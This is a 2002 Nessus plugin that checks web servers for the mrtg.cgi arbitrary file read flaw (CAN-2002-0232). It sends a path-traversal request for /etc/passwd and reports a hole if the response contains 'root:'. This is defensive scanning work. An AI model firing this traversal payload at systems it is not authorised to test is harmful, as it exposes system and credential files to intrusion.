#
# This script was written by Renaud Deraison <deraison@cvs.nessus.org>
#
# See the Nessus Scripts License for details
#

if(description)
{
 script_id(10842);
 script_cve_id("CAN-2002-0232");
 script_version("$Revision: 1.3 $");

 name["english"] = "mrtg.cgi";
 name["francais"] = "mrtg.cgi";
 script_name(english:name["english"], francais:name["francais"]);
 
 desc["english"] = "The CGI 'mrtg.cgi' is installed. This CGI has
a well known security flaw that lets an attacker read arbitrary
files with the privileges of the http daemon (usually root or nobody).

Solution : Delete the file or upgrade to the latest version

Risk factor : Serious";



 script_description(english:desc["english"]);
 
 summary["english"] = "Checks for the presence of /cgi-bin/mrtg.cgi";
 summary["francais"] = "Vrifie la prsence de /cgi-bin/mrtg.cgi";
 
 script_summary(english:summary["english"], francais:summary["francais"]);
 
 script_category(ACT_GATHER_INFO);
 
 
 script_copyright(english:"This script is Copyright (C) 2002 Renaud Deraison",
		francais:"Ce script est Copyright (C) 2002 Renaud Deraison");
 family["english"] = "CGI abuses";
 family["francais"] = "Abus de CGI";
 script_family(english:family["english"], francais:family["francais"]);
 script_dependencie("find_service.nes", "no404.nasl");
 script_require_ports("Services/www", 80);
 exit(0);
}

#
# The script code starts here
#

port = get_kb_item("Services/www");
if(port){
 req = http_get(item:string(cgibin(), "/mrtg.cgi?cfg=../../../../../../../../etc/passwd"),
 		port:port);
 soc = http_open_socket(port);
 send(socket:soc, data:req);
 r = recv(socket:soc, length:4096);
 close(soc);
 if("root:" >< r)	
 	security_hole(port);
 }
